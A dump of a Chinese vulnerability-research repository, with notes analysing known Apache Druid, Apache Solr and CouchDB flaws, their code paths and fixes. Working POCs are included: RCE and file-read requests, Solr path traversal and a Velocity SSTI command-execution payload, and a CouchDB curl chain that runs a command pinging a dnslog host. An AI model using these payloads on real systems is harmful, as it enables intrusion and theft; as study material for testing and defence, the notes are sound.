├── .gitignore
├── Database
    ├── Apache Druid.md
    ├── Apache Solr.md
    ├── CouchDB.md
    ├── ElasticSearch.md
    ├── H2 Database.md
    ├── InfluxDB.md
    ├── mssql.md
    └── mysql.md
├── Go Security
    └── Go Server Side Template Injection(SSTI).md
├── JavaVulType
    ├── Expression.md
    ├── JDBC.md
    ├── XXE.md
    └── 常见利用类.md
├── Java_OA
    ├── CDGServer3_old.md
    ├── Ecology9_install.md
    ├── EcologyAudit.md
    ├── FEOAv6.51.md
    ├── FineReportAudit.md
    ├── LandrayEkpAudit.md
    ├── NacosAudit.md
    ├── Nexus Repository Manager Audit.md
    ├── Route_Struts2.md
    ├── RuoYi.md
    ├── SeeyonAudit.md
    ├── Seeyon_clazzDecompile.md
    ├── Smartbi_Audit.md
    ├── Teamcity_Audit.md
    ├── WCM_Audit.md
    ├── blacklist-v11.0.10.txt
    ├── entCRM.md
    ├── huidianOA.md
    ├── jwycbjnoyees.jar
    ├── qiwangzhizao.md
    ├── xstream.md
    └── yongyou_NC_Audit.md
├── Other_OA
    ├── Chanjet.md
    ├── DedeCMS.md
    ├── ThinkPHP.md
    ├── Thinkphp框架鉴权分析.md
    ├── Zentao.md
    ├── images
    │   ├── zentao1.png
    │   ├── zentao10.png
    │   ├── zentao2.png
    │   ├── zentao3.png
    │   ├── zentao4.png
    │   ├── zentao5.png
    │   ├── zentao6.png
    │   ├── zentao7.png
    │   ├── zentao8.png
    │   └── zentao9.png
    ├── wuzhicms.md
    ├── 泛微E-Office.md
    ├── 通达OA.md
    └── 金山终端安全系统.md
├── README.md
├── Server
    ├── Jboss.md
    ├── Jetty.md
    ├── Nginx.md
    ├── PrimetonPASAudit.md
    ├── Tomcat.md
    ├── TongWeb.md
    └── Weblogic.md
├── Struts2
    ├── POC解析.md
    ├── Struts2漏洞分析.md
    └── demo
    │   ├── S2-001.war
    │   ├── S2-007.war
    │   ├── S2-009.war
    │   ├── S2-012.war
    │   ├── S2-013.war
    │   ├── S2-015.war
    │   ├── S2-019.war
    │   ├── S2-029.war
    │   ├── S2-033.war
    │   ├── S2-045.war
    │   ├── S2-046.war
    │   ├── S2-048.war
    │   ├── S2-052.war
    │   ├── S2-053.war
    │   ├── s2-003.war
    │   ├── s2-005.war
    │   ├── s2-008.war
    │   ├── s2-016.war
    │   ├── s2-032.war
    │   └── s2-037.war
└── images
    ├── CDGServer3_old.png
    ├── Pasted image 20230307105828.png
    ├── Pasted image 20230310210247.png
    ├── Pasted image 20230310211445.png
    ├── filter.png
    ├── image-20230829101922114.png
    ├── image-20240112170234236.png
    ├── security_diagram.jpg
    └── 致远服务配置Agent.png


/.gitignore:
--------------------------------------------------------------------------------
1 | .DS_Store


--------------------------------------------------------------------------------
/Database/Apache Druid.md:
--------------------------------------------------------------------------------
 1 | # Apache Druid
 2 | 
 3 | Apache Druid是面向列的分布式数据存储，由Java编写。其他类似的column-oriented型数据库，参考： https://en.wikipedia.org/wiki/List_of_column-oriented_DBMSes
 4 | 
 5 | 官方文档： https://druid.apache.org/docs/latest/tutorials/index.html
 6 | 
 7 | 源码下载： https://github.com/apache/druid
 8 | 
 9 | 安装包下载： https://archive.apache.org/dist/druid/
10 | 
11 | Linux下安装、启动（要求Java8）
12 | ```
13 | tar -zxvf apache-druid-0.17.0-bin.tar.gz
14 | cd /apache-druid-0.17.0/bin
15 | ./start-nano-quickstart
16 | ```
17 | 访问`http://localhost:8888`
18 | 
19 | 历史漏洞
20 | 
21 | |漏洞编号|漏洞类型|影响版本|
22 | |:----:|:----:|:----:|
23 | |CVE-2021-36749|文件读取|< 0.21.0|
24 | |CVE-2021-26920|文件读取|0.20.x|
25 | |CVE-2021-26919|RCE|< 0.20.2|
26 | |CVE-2021-25646|RCE|<= 0.20.0|
27 | |CVE-2020-1958|身份认证绕过|0.17.0|
28 | 
29 | ## CVE-2020-1958
30 | Ref： https://github.com/ggolawski/CVE-2020-1958
31 | 
32 | ## CVE-2021-25646
33 | Ref： https://www.zerodayinitiative.com/blog/2021/3/25/cve-2021-25646-getting-code-execution-on-apache-druid
34 | 
35 | POC
36 | ```
37 | POST /druid/indexer/v1/sampler HTTP/1.1
38 | Host: 127.0.0.1:8888
39 | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.16; rv:85.0) Gecko/20100101 Firefox/85.0
40 | Accept: application/json, text/plain, */*
41 | Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
42 | Content-Type: application/json
43 | Content-Length: 994
44 | Connection: close
45 | 
46 | 
47 | {"type": "index", "spec": {"ioConfig": {"type": "index", "inputSource": {"type": "inline", "data": "{\"isRobot\":true,\"channel\":\"#x\",\"timestamp\":\"2021-2-1T14:12:24.050Z\",\"flags\":\"x\",\"isUnpatrolled\":false,\"page\":\"1\",\"diffUrl\":\"https://xxx.com\",\"added\":1,\"comment\":\"Botskapande Indonesien omdirigering\",\"commentLength\":35,\"isNew\":true,\"isMinor\":false,\"delta\":31,\"isAnonymous\":true,\"user\":\"Lsjbot\",\"deltaBucket\":0,\"deleted\":0,\"namespace\":\"Main\"}"}, "inputFormat": {"type": "json", "keepNullColumns": true}}, "dataSchema": {"dataSource": "sample", "timestampSpec": {"column": "timestamp", "format": "iso"}, "dimensionsSpec": {}, "transformSpec": {"transforms": [], "filter": {"type": "javascript", "dimension": "added", "function": "function(value) {java.lang.Runtime.getRuntime().exec('open -a Calculator')}", "": {"enabled": true}}}}, "type": "index", "tuningConfig": {"type": "index"}}, "samplerConfig": {"numRows": 500, "timeoutMs": 15000}}
48 | ```
49 | 
50 | ## CVE-2021-26919
51 | POC
52 | ```
53 | {
54 |     "type": "pollingLookup",
55 |     "pollPeriod": "PT10M",
56 |     "dataFetcher":
57 |     {
58 |         "type": "jdbcDataFetcher",
59 |         "connectorConfig": "jdbc://mysql://localhost:3306/my_data_base",
60 |         "table": "lookup_table_name",
61 |         "keyColumn": "key_column_name",
62 |         "valueColumn": "value_column_name"
63 |     },
64 |     "cacheFactory":
65 |     {
66 |         "type": "onHeapPolling"
67 |     }
68 | }
69 | ```
70 | 
71 | ## CVE-2021-36749
72 | 
73 | 页面上点击load data，然后选择`http(s)://`，点击connect后在URIs处填入`file://etc/passwd`即可读取文件
74 | POC
75 | ```
76 | curl http://127.0.0.1:8888/druid/indexer/v1/sampler?for=connect -H "Content-Type:application/json" -X POST -d "{\"type\":\"index\",\"spec\":{\"type\":\"index\",\"ioConfig\":{\"type\":\"index\",\"firehose\":{\"type\":\"http\",\"uris\":[\" file:///etc/passwd \"]}},\"dataSchema\":{\"dataSource\":\"sample\",\"parser\":{\"type\":\"string\", \"parseSpec\":{\"format\":\"regex\",\"pattern\":\"(.*)\",\"columns\":[\"a\"],\"dimensionsSpec\":{},\"timestampSpec\":{\"column\":\"no_ such_ column\",\"missingValue\":\"2010-01-01T00:00:00Z\"}}}}},\"samplerConfig\":{\"numRows\":500,\"timeoutMs\":15000}}"
77 | ```
78 | 


--------------------------------------------------------------------------------
/Database/Apache Solr.md:
--------------------------------------------------------------------------------
  1 | # Apache Solr
  2 | 
  3 | 官方网站： https://solr.apache.org/
  4 | 
  5 | 历史版本安装包和软件下载： http://archive.apache.org/dist/lucene/solr/
  6 | 
  7 | 官方漏洞说明： https://issues.apache.org/jira/projects/SOLR/issues/SOLR-15718?filter=allopenissues
  8 | 
  9 | 
 10 | 历史漏洞
 11 | |漏洞编号|漏洞类型|影响版本|
 12 | |:----:|:----:|:----:|
 13 | |CVE-2021-27905|SSRF|<= 7.7.3, 8.8.1 |
 14 | |CVE-2020-13957|RCE|<= 6.6.6、7.7.3、8.6.2 |
 15 | |CVE-2019-17558|RCE| 5.0.0-8.3.1|
 16 | |CVE-2019-0193|RCE|< 8.2.0|
 17 | |CVE-2019-0192|RCE|<= 5.5.5, 6.6.5|
 18 | |CVE-2018-1308|XXE|<= 6.6.2, 7.2.1|
 19 | |CVE-2017-12629|RCE|< 7.1|
 20 | |CVE-2017-12629|XXE|< 7.1|
 21 | |CVE-2017-3164|SSRF|<= 7.6|
 22 | |CVE-2017-3163|任意文件读取|< 6.4.1|
 23 | 
 24 | 解压安装包后，即可运行调试
 25 | ```
 26 | // 以debug模式运行
 27 | solr.cmd -f -a "-agentlib:jdwp=transport=dt_socket,server=y,suspend=n,address=5555" -p 8983
 28 | 
 29 | // 生成测试数据（生成路径为Solr文件夹下的example\example-DIH\solr）
 30 | solr.cmd -f -e dih
 31 | 
 32 | // 停止服务
 33 | solr.cmd stop -p 8983
 34 | 
 35 | // 以debug模式运行并执行测试数据
 36 | solr.cmd -f -a "-agentlib:jdwp=transport=dt_socket,server=y,suspend=n,address=5555" -p 8983 -s "C:\Solr\solr-6.4.0\example\example-DIH\solr"
 37 | 
 38 | // 创建核心
 39 | solr.cmd create -c solr_sample
 40 | 
 41 | // 删除核心
 42 | solr.cmd delete -c solr_sample
 43 | ```
 44 | 
 45 | 常用API
 46 | ```
 47 | 查看核心
 48 | /solr/admin/cores?indexInfo=false&wt=json
 49 | 查看某一核心的配置
 50 | /solr/[core]/config
 51 | 
 52 | ```
 53 | 
 54 | ## CVE-2017-3163
 55 | 问题出现在索引复制功能（Replication），Apache Solr节点会从master/leader节点通过文件名拉取文件。但是并没有对文件名进行校验，就造成了任意文件读取。测试数据中自带的核心包含db、mail、rss、solr、tika
 56 | 
 57 | 以db核心的Replication功能为例的POC如下
 58 | ```
 59 | GET /solr/db/replication?command=filecontent&file=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2FWindows%2Fwin.ini&wt=filestream&generation=1
 60 | ```
 61 | 直接启动Solr默认启动的是jetty服务器，jetty的特点是最终调用某个具体的Handler来处理请求。`jetty ServletHandler.doHandle() -> solr SolrDispatchFilter.doFilter`。然后Solr在处理请求时也会分发到对应的Hanlder。`ReplicationHandler`处理具体请求的核心代码如下
 62 | ```
 63 | public void handleRequestBody(SolrQueryRequest req, SolrQueryResponse rsp) throws Exception {
 64 |     final SolrParams solrParams = req.getParams();
 65 |     String command = solrParams.get(COMMAND);
 66 |     if (command.equals(CMD_INDEX_VERSION)) {...}  // command值为indexversion
 67 |     else if (command.equals(CMD_GET_FILE)) { // command值为filecontent
 68 |         getFileStream(solrParams, rsp); // 会讲file文件流放在rsp中
 69 |     }
 70 |     else if (command.equalsIgnoreCase(CMD_FETCH_INDEX)) {  //command值为fetchindex
 71 |         String masterUrl = solrParams.get(MASTER_URL);
 72 |         final SolrParams paramsCopy = new ModifiableSolrParams(solrParams);
 73 |         Thread fetchThread = new Thread(() -> doFetch(paramsCopy, false), "explicit-fetchindex-cmd") ;
 74 |         fetchThread.setDaemon(false);
 75 |         fetchThread.start();
 76 |         rsp.add(STATUS, OK_STATUS);
 77 |     }
 78 |     ... // filelist、backup、restore、restorestatus、deletebackup、disablepoll、enablepoll、abortfetch、commits、details
 79 | }
 80 | 
 81 | private void getFileStream(SolrParams solrParams, SolrQueryResponse rsp) {
 82 |     ModifiableSolrParams rawParams = new ModifiableSolrParams(solrParams);
 83 |     rawParams.set(CommonParams.WT, FILE_STREAM);
 84 |     ...
 85 |     } else {
 86 |         rsp.add(FILE_STREAM, new DirectoryFileStream(solrParams));
 87 |     }
 88 | }
 89 | 
 90 | public DirectoryFileStream(SolrParams solrParams) {
 91 |     params = solrParams;
 92 |     fileName = params.get(FILE); // 从请求中获取file属性值，即文件名
 93 |     cfileName = params.get(CONF_FILE_SHORT);
 94 |     indexGen = params.getLong(GENERATION);
 95 |     ...
 96 | }
 97 | ```
 98 | 请求处理完成后，会写入响应内容。进而调用的就是`DirectoryFileStream.write()`方法，会将所处核心的数据绝对路径与fileName相拼接，然后读取文件内容，`fos.write(buf, 0, read);fos.flush();`将文件内容写入到响应body中。
 99 | 
100 | 漏洞修复
101 | 漏洞修复时在DirectoryFileStream构造函数中加入了对于文件名的判断，包含`..`或者是绝对路径都是抛出异常
102 | ```
103 | protected String validateFilenameOrError(String filename){
104 | 	if(filename!=null){
105 | 		if("..".equals(subpath.toString())){throw new SolrException()}
106 | 		if(filePath.isAbsolute()){throw new SolrException()}
107 | 	}
108 | }
109 | ```
110 | 
111 | ## CVE-2017-3164
112 | 问题同样出现在索引复制功能（Replication），如同上面ReplicationHandler处理具体请求的核心代码，command为fetchindex时，会更新要下载的文件列表。最终调用的是`IndexFetcher.fetchFileList()`，创建一个HttpSolrClient发送请求，造成SSRF漏洞。
113 | ```
114 | NamedList getLatestVersion() throws IOException {
115 |     QueryRequest req = new QueryRequest(params);
116 |     try (HttpSolrClient client = new HttpSolrClient.Builder(masterUrl).withHttpClient(myHttpClient).build()) {
117 |       client.setSoTimeout(60000);
118 |       client.setConnectionTimeout(15000);
119 | 
120 |       return client.request(req);
121 |     } ...
122 |   }
123 | ```
124 | POC
125 | ```
126 | GET /solr/db/replication?command=fetchindex&masterUrl=http://xxx.dnslog.cn/xxxx&wt=json&httpBasicAuthUser=aaa&httpBasicAuthPassword=bbb HTTP/1.1
127 | ```
128 | 
129 | ## CVE-2017-12629
130 | XML有很多解析方式，包括DOM、SAX、JDO、DOM4J等技术。其中DOM最常用的解析方式如下。如果可以引用外部实体，就会造成XXE漏洞。所以一般的防御方式是在代码中加入`factory.setExpandEntityReferences(false);`来禁用外部实体。
131 | ```
132 | DocumentBuilderFactory factory = DocumentBuilderFactory.newInstance();
133 | DocumentBuilder builder = factory.newDocumentBuilder();
134 | File f = new File("books.xml");
135 | Document doc = builder.parse(f);
136 | ```
137 | lucene的核心解析器`CoreParser`解析xml时的代码简化如下，发现并没有禁用外部实体，存在XXE漏洞
138 | ```
139 |   static Document parseXML(InputStream pXmlFile) throws ParserException {
140 |     DocumentBuilderFactory dbf = DocumentBuilderFactory.newInstance();
141 |     DocumentBuilder db = dbf.newDocumentBuilder();
142 |     org.w3c.dom.Document doc = db.parse(pXmlFile);
143 |     return doc;
144 |   }
145 | ```
146 | 官方在修复此漏洞时则是在上述代码中加入`dbf.setFeature("http://javax.xml.XMLConstants/feature/secure-processing",true)`
147 | 
148 | ## CVE-2018-1308
149 | 同样是XXE漏洞，问题出在`DataImportHandler`处理请求时，会加载配置文件。`DataImportHandler.handleRequestBody() -> DataImporter.maybeReloadConfiguration() -> DataImporter.loadDataConfig()`，代码如下也没有禁用外部实体。
150 | ```
151 | public DIHConfiguration loadDataConfig(InputSource configFile) {
152 |     DocumentBuilderFactory dbf = DocumentBuilderFactory.newInstance();
153 |     if (this.core != null && configFile.getSystemId() != null) {
154 |         dbf.setXIncludeAware(true);
155 |         dbf.setNamespaceAware(true);
156 |     }
157 |     DocumentBuilder builder = dbf.newDocumentBuilder();
158 |     if (this.core != null) {
159 |         builder.setEntityResolver(new SystemIdResolver(this.core.getResourceLoader()));
160 |     }
161 |     builder.setErrorHandler(XMLLOG);
162 |     Document document=builder.parse(configFile);
163 |     dihcfg = this.readFromXml(document);
164 | }
165 | ```
166 | 
167 | 
168 | ## CVE-2019-17558
169 | 查看某一核心的solrconfig.xml配置文件，有如下配置。QueryResponseWriter是Solr插件，可以定义任何请求的响应格式。
170 | ```
171 | <queryResponseWriter name="velocity" class="solr.VelocityResponseWriter" startup="lazy">
172 |     <str name="template.base.dir">${velocity.template.base.dir:}</str>
173 | </queryResponseWriter>
174 | ```
175 | 2Apache Solr默认集成VelocityResponseWriter插件，在该插件的初始化参数中的params.resource.loader.enabled这个选项是用来控制是否允许参数资源加载器在Solr请求参数中指定模版，默认设置是false。
176 | 通过请求开启`params.resource.loader.enabled`（此配置默认为false，即默认不允许加载器指定模板），否则模版执行会报错`unable to find resource 'custom.vm'`
177 | ```
178 | POST /solr/db/config HTTP/1.1
179 | Content-Type: application/json
180 | 
181 | {
182 |   "update-queryresponsewriter": {
183 |     "startup": "lazy",
184 |     "name": "velocity",
185 |     "class": "solr.VelocityResponseWriter",
186 |     "template.base.dir": "",
187 |     "solr.resource.loader.enabled": "true",
188 |     "params.resource.loader.enabled": "true"
189 |   }
190 | }
191 | ```
192 | SSTI命令执行+回显payload
193 | ```
194 | GET /solr/db/select?q=1&&wt=velocity&v.template=custom&v.template.custom=%23set($x=%27%27)+%23set($rt=$x.class.forName(%27java.lang.Runtime%27))+%23set($chr=$x.class.forName(%27java.lang.Character%27))+%23set($str=$x.class.forName(%27java.lang.String%27))+%23set($ex=$rt.getRuntime().exec(%27whoami%27))+$ex.waitFor()+%23set($out=$ex.getInputStream())+%23foreach($i+in+[1..$out.available()])$str.valueOf($chr.toChars($out.read()))%23end
195 | ```
196 | 
197 | 
198 | ## 任意文件读取
199 | 首先修改配置
200 | ```
201 | POST /solr/db/config HTTP/1.1
202 | Content-Type: application/json
203 | 
204 | {  "set-property" : {"requestDispatcher.requestParsers.enableRemoteStreaming":true}}
205 | ```
206 | 读取文件
207 | ```
208 | curl "http://172.16.165.146:8983/solr/db/debug/dump?param=ContentStreams" -F "stream.url=file:///C:/Windows/win.ini"
209 | ```
210 | 
211 | 
212 | ## Solr资料
213 | https://github.com/veracode-research/solr-injection
214 | 
215 | https://raw.githubusercontent.com/artsploit/solr-injection/master/slides/DEFCON-27-Michael-Stepankin-Apache-Solr-Injection.pdf
216 | 
217 | 


--------------------------------------------------------------------------------
/Database/CouchDB.md:
--------------------------------------------------------------------------------
  1 | # CouchDB
  2 | 
  3 | CouchDB属于NoSQL数据库的一种，数据库内容以Documents形式而不是表形式存储，有Map/Reduce系统支持。CouchDB用Erlang编写，但允许用户在Javascript中指定文档验证脚本。创建或更新文档时会自动执行这些脚本。  
  4 | 官方网址： https://couchdb.apache.org/  
  5 | 历史安装版本下载地址：https://archive.apache.org/dist/couchdb/binary/win/1.6.1/  
  6 | 历史源码下载： https://archive.apache.org/dist/couchdb/source/1.6.1/  
  7 | 重点历史漏洞：
  8 | |漏洞编号| 漏洞类型 |影响版本|
  9 | |:----:|:----:|:----:|
 10 | |CVE-2017-12635|远程权限提升| < 1.7.1 or 2.1.1|
 11 | |CVE-2017-12636|RCE| < 1.7.1 or 2.1.1|
 12 | |CVE-2018-8007|RCE| < 1.7.2 or 2.1.2|
 13 | |CVE-2021-38295|远程权限提升| < 3.1.2|
 14 | 
 15 | ### 基本使用
 16 | CouchDB主要有两种管理方式，一种是通过curl发包，另一种是通过自身名为Futon的管理界面  
 17 | CouchDB的Web地址：http://127.0.0.1:5984/  
 18 | CouchDB的Futon管理界面： http://localhost:5984/_utils/  
 19 | 
 20 | 默认表： `_users`和`_replicator`
 21 | 
 22 | **curl语句**  
 23 | 查看数据库列表： `curl -X GET http://127.0.0.1:5984/_all_dbs`  
 24 | 创建数据库： `curl -X PUT http://localhost:5984/database_name`  
 25 | 删除数据库： `curl -X DELETE http://127.0.0.1:5984/database_name`  
 26 | 创建文档： `curl -X PUT http://127.0.0.1:5984/database_name/"001" -d "{\"Name\":\"AxisX\",\"age\":\"18\",\"Title\":\"Hacker\"}" -H "Content-Type: application/json"`  
 27 | 更新文档： `curl -X PUT http://127.0.0.1:5984/database_name/"001" -d "{\"age\":\"19\",\"_rev\":\"revisionID\"}" -H "Content-Type: application/json"`  
 28 | 删除文档： `curl -X DELETE http://127.0.0.1:5984/database_name/001?rev=revisionID`  
 29 | 附加文件： `curl -vX PUT http://127.0.0.1:5984/database_name/001/boy.jpg?rev=revisionID --data-binary @boy.jpg -H "ContentType:image/jpg"`  
 30 | 创建用户： `curl -X PUT http://127.0.0.1:5984/_users/org.couchdb.user:testuser -H "Content-Type: application/json" -d "{\"name\":\"testuser\",\"password\":\"testuser\",\"roles\":[],\"type\":\"user\"}'`  
 31 | 用户登陆： `curl -vX POST https://dev.imaicloud.com/couchdb/_session -H "Content-Type:application/x-www-form-urlencoded" -d "name=test&password=test"`  
 32 | 
 33 | 
 34 | ### CVE-2017-12635
 35 | 参考链接：https://justi.cz/security/2017/11/14/couchdb-rce-npm.html  
 36 | 如果CouchDB安装后配置了用户，那么打开`_users`表会存在一个默认Key`"_design/_auth"`，该Key包含了四个Field：`_id:`_design/_auth、`_rev:xxx`、`language:javascript`、`validate_doc_update:function(xxx)`。`validate_doc_update`字段具体值如下，是javascript的脚本
 37 | ```javascript
 38 |     function(newDoc, oldDoc, userCtx, secObj) {
 39 |         if (newDoc._deleted === true) {
 40 |             // allow deletes by admins and matching users
 41 |             // without checking the other fields
 42 |             if ((userCtx.roles.indexOf('_admin') !== -1) ||
 43 |                 (userCtx.name == oldDoc.name)) {
 44 |                 return;
 45 |             } else {
 46 |                 throw({forbidden: 'Only admins may delete other user docs.'});
 47 |             }
 48 |         }
 49 | 
 50 |         if ((oldDoc && oldDoc.type !== 'user') || newDoc.type !== 'user') {
 51 |             throw({forbidden : 'doc.type must be user'});
 52 |         } // we only allow user docs for now
 53 | 
 54 |         if (!newDoc.name) {
 55 |             throw({forbidden: 'doc.name is required'});
 56 |         }
 57 | 
 58 |         if (!newDoc.roles) {
 59 |             throw({forbidden: 'doc.roles must exist'});
 60 |         }
 61 | 
 62 |         if (!isArray(newDoc.roles)) {
 63 |             throw({forbidden: 'doc.roles must be an array'});
 64 |         }
 65 | 
 66 |         for (var idx = 0; idx < newDoc.roles.length; idx++) {
 67 |             if (typeof newDoc.roles[idx] !== 'string') {
 68 |                 throw({forbidden: 'doc.roles can only contain strings'});
 69 |             }
 70 |         }
 71 | 
 72 |         if (newDoc._id !== ('org.couchdb.user:' + newDoc.name)) {
 73 |             throw({
 74 |                 forbidden: 'Doc ID must be of the form org.couchdb.user:name'
 75 |             });
 76 |         }
 77 | 
 78 |         if (oldDoc) { // validate all updates
 79 |             if (oldDoc.name !== newDoc.name) {
 80 |                 throw({forbidden: 'Usernames can not be changed.'});
 81 |             }
 82 |         }
 83 | 
 84 |         if (newDoc.password_sha && !newDoc.salt) {
 85 |             throw({
 86 |                 forbidden: 'Users with password_sha must have a salt.' +
 87 |                     'See /_utils/script/couch.js for example code.'
 88 |             });
 89 |         }
 90 | 
 91 |         if (newDoc.password_scheme === "pbkdf2") {
 92 |             if (typeof(newDoc.iterations) !== "number") {
 93 |                throw({forbidden: "iterations must be a number."});
 94 |             }
 95 |             if (typeof(newDoc.derived_key) !== "string") {
 96 |                throw({forbidden: "derived_key must be a string."});
 97 |             }
 98 |         }
 99 | 
100 |         var is_server_or_database_admin = function(userCtx, secObj) {
101 |             // see if the user is a server admin
102 |             if(userCtx.roles.indexOf('_admin') !== -1) {
103 |                 return true; // a server admin
104 |             }
105 | 
106 |             // see if the user a database admin specified by name
107 |             if(secObj && secObj.admins && secObj.admins.names) {
108 |                 if(secObj.admins.names.indexOf(userCtx.name) !== -1) {
109 |                     return true; // database admin
110 |                 }
111 |             }
112 | 
113 |             // see if the user a database admin specified by role
114 |             if(secObj && secObj.admins && secObj.admins.roles) {
115 |                 var db_roles = secObj.admins.roles;
116 |                 for(var idx = 0; idx < userCtx.roles.length; idx++) {
117 |                     var user_role = userCtx.roles[idx];
118 |                     if(db_roles.indexOf(user_role) !== -1) {
119 |                         return true; // role matches!
120 |                     }
121 |                 }
122 |             }
123 | 
124 |             return false; // default to no admin
125 |         }
126 | 
127 |         if (!is_server_or_database_admin(userCtx, secObj)) {
128 |             if (oldDoc) { // validate non-admin updates
129 |                 if (userCtx.name !== newDoc.name) {
130 |                     throw({
131 |                         forbidden: 'You may only update your own user document.'
132 |                     });
133 |                 }
134 |                 // validate role updates
135 |                 var oldRoles = oldDoc.roles.sort();
136 |                 var newRoles = newDoc.roles.sort();
137 | 
138 |                 if (oldRoles.length !== newRoles.length) {
139 |                     throw({forbidden: 'Only _admin may edit roles'});
140 |                 }
141 | 
142 |                 for (var i = 0; i < oldRoles.length; i++) {
143 |                     if (oldRoles[i] !== newRoles[i]) {
144 |                         throw({forbidden: 'Only _admin may edit roles'});
145 |                     }
146 |                 }
147 |             } else if (newDoc.roles.length > 0) {
148 |                 throw({forbidden: 'Only _admin may set roles'});
149 |             }
150 |         }
151 | 
152 |         // no system roles in users db
153 |         for (var i = 0; i < newDoc.roles.length; i++) {
154 |             if (newDoc.roles[i][0] === '_') {
155 |                 throw({
156 |                     forbidden:
157 |                     'No system roles (starting with underscore) in users db.'
158 |                 });
159 |             }
160 |         }
161 | 
162 |         // no system names as names
163 |         if (newDoc.name[0] === '_') {
164 |             throw({forbidden: 'Username may not start with underscore.'});
165 |         }
166 | 
167 |         var badUserNameChars = [':'];
168 | 
169 |         for (var i = 0; i < badUserNameChars.length; i++) {
170 |             if (newDoc.name.indexOf(badUserNameChars[i]) >= 0) {
171 |                 throw({forbidden: 'Character `' + badUserNameChars[i] +
172 |                         '` is not allowed in usernames.'});
173 |             }
174 |         }
175 |     }
176 | ```
177 | 这个javascript脚本对请求中的权限等进行了校验，如果不合规就抛出异常。Erlang语言有很多解析JSON的库，例如`mochijson2，Jiffy`。CouchDB用到的JSON解析器在官方文档的`1.10. Troubleshooting an Installation`部分有提到，CouchDB不同版本用到了不同的JSON encoders，即JSON编码器。早期用的就是Jiffy  
178 | 但是Javascript对于JSON的解析和Jiffy存在差异，尤其在**重复键**上，例如JSON语句`{"foo":"bar", "foo":"baz"}`，二者的解析对比结果如下
179 | ```
180 | > jiffy:decode("{\"foo\":\"bar\", \"foo\":\"baz\"}"). 
181 | {[{<<"foo">>,<<"bar">>},{<<"foo">>,<<"baz">>}]}
182 | 
183 | > JSON.parse("{\"foo\":\"bar\", \"foo\": \"baz\"}")
184 | {foo: "baz"}
185 | ```
186 | 对于给定的键，Erlang解析器Jiffy将存储两个值，但Javascript解析器将只存储最后一个值。而CouchDB在处理数据时其getter函数只返回第一个值。所以如果让第一个值是admin权限，第二个值是个空值。就可以绕过javascript校验
187 | ```
188 | % Within couch_util:get_value 
189 | lists:keysearch(Key, 1, List).
190 | ```
191 | 
192 | ### CVE-2017-12636
193 | 参考链接：https://justi.cz/security/2017/11/14/couchdb-rce-npm.html  
194 | 这篇文章中同样提到，如何获取shell。CouchDB允许通过query_server定义语言来执行命令。查询1.6的CouchDB说明文档， `3.8.1 Query Servers Definition`部分说到CouchDB的Design Functions计算功能是由外部查询服务器执行的，而外部查询服务器实际上是一个特殊的操作系统进程，外部查询服务器需要在配置文件中定义
195 | ```
196 | [query_servers]
197 | LANGUAGE = PATH ARGS
198 | ```
199 | Language是外部查询服务器会执行的代码，PATH是二进制文件的路径，ARGS是命令行参数。根据API接口文档，想要更改配置文件需要`PUT /_config/{section}/{key}`，那么设置query_servers的代码如下
200 | ```
201 | curl -X PUT 'http://admin:admin@your-ip:5984/_config/query_servers/cmd' -d '"ping xxx.dnslog.cn"'
202 | ```
203 | API文档中提到想要执行view function的代码如下`POST /{db}/_temp_view`，但是想要执行这个代码就需要有一个真实存在的db，所以payload也是先创建了db和具体的doc。
204 | ```
205 | curl -X PUT 'http://admin:admin@your-ip:5984/my_database'
206 | curl -X PUT 'http://admin:admin@your-ip:5984/my_database/"001" -d "{\"Name\":\"AxisX\",\"age\":\"18\",\"Title\":\"Hacker\"}" -H "Content-Type: application/json"`
207 | curl -X POST 'http://admin:admin@your-ip:5984/my_database/_temp_view?limit=10' -d '{"language": "cmd", "map":""}' -H 'Content-Type: application/json'
208 | ```
209 | 2.1.0版本Payload和1.6版本有很多不同。首先就是接口`/{db}/_temp_view`没有了。那么上面这个1.6的payload就完全不适用了。但是也增加了一些接口`_cluster_setup`、`_membership`等。在查找配置接口的文档中发现，配置接口的访问路径更改为`/_node/{node-name}/_config`，这是由于Couchdb 2.x 引入了集群概念，要具体到某一个节点下进行配置。并且该接口的访问中依然保有`query_servers`这种方式，官方示例代码如下
210 | ```
211 | "query_servers": {
212 |     "javascript": "/usr/bin/couchjs /usr/share/couchdb/server/main.js"
213 | },
214 | ```
215 | 
216 | 那么要先找到一个节点。然后修改其`query_servers`配置。访问`_membership`接口，可以看到集群中所有节点的状态，选择其中一个已有节点，`couchdb@localhost`。
217 | ```
218 | {"all_nodes":["couchdb@localhost"],"cluster_nodes":["couchdb@localhost"]}
219 | ```
220 | 然后访问该节点的配置接口路径`/_node/couchdb@localhost/_config`。配置完成后还是要考虑触发的问题。查询官方文档`PUT /{db}/_design/{ddoc}`会修订现有Desin Documents，并包含视图对象可以调用view functions。
221 | 
222 | 完整Payload如下
223 | ```
224 | curl http://localhost:5984/_membership
225 | curl -X PUT http://localhost:5984/_node/couchdb@localhost/_config/query_servers/cmd -d "\"ping m74ovz.dnslog.cn\""
226 | curl -X PUT http://localhost:5984/my_database
227 | curl -X PUT http://localhost:5984/my_database/"001" -d "{\"Name\":\"AxisX\",\"age\":\"18\",\"Title\":\"Hacker\"}" -H "Content-Type: application/json"
228 | curl -X PUT http://localhost:5984/my_database/_design/"001" -d '{"_id":"_design/test", "views":{"lululu":{"map":""} }," language": "cmd"}' -H "Content-Type: application/json"
229 | ```
230 | 
231 | ### CVE-2018-8007
232 | 参考链接：https://www.mdsec.co.uk/2018/08/advisory-cve-2018-8007-apache-couchdb-remote-code-execution/  
233 | 2.1.1版本再执行CVE-2017-12636中的`/_node/couchdb@localhost/_config/query_servers/cmd`会报错forbidden，显示`Config section blacklisted for modification over HTTP API.`  
234 | 查看源码文件`https://github.com/apache/couchdb/blob/master/src/couch/src/couch_util.erl`，会发现黑名单相关代码如下。query_servers被列入到了黑名单中，符合上面测试中的报错信息。
235 | ```
236 | define(BLACKLIST_CONFIG_SECTIONS, [
237 | <<“daemons”>>,
238 | <<“external”>>,
239 | <<“httpd_design_handlers”>>,
240 | <<“httpd_db_handlers”>>,
241 | <<“httpd_global_handlers”>>,
242 | <<“native_query_servers”>>,
243 | <<“os_daemons”>>,
244 | <<“query_servers”>>
245 | ]).
246 |  
247 | check_config_blacklist(Section) ->
248 | case lists:member(Section, ?BLACKLIST_CONFIG_SECTIONS) of
249 | true ->
